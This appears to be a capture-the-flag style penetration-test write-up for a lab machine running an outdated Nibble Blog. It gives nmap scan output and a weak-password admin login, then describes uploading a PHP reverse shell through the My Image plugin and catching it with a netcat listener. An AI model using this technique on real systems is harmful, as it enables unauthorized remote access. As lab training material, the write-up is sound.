Vulnerable Exploit: Weak password policy and Nibble Blog version is out of dated.
System Vulnerable: 10.10.10.75
Vulnerability Explanation: The machine use weak password policy which allow us to login as admin and exploit vulnerable of Nibble blog version contain Code Execution which allow us to get foothold on the machine.
Privilege Escalation Vulnerability: Misconfigure of File Permission
Vulnerability Fix: Implement Strong Password policy and upgrade version of Nibble Blog.
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -sC -sV -p- -T4 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 11:35 EDT
Nmap scan report for 10.10.10.75
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80/tcp Apache/2.4.18 (Ubuntu)
By start browsing on port 80, we just see "Hello world!". But checking on source code, we can see interesting comment at the end.
Going through the directory, we can see the webpage. By checking each function of the webpage, it doesn't anything interesting. Let start discover hidden directory.
On the webpage, one function redirect to feed.php. Let start enumerate with extension txt and php
Next step follow the exploit description Plugins > My Image > Configure. Copy PHP reverse shell from webshells directory. Then, replacing IP address with our kali IP address and save it as image.php and start netcat listener on port 1234. Let upload our payload and ignore the error.
nc -lvp 1234
Going through the link to execute the reverse shell script.
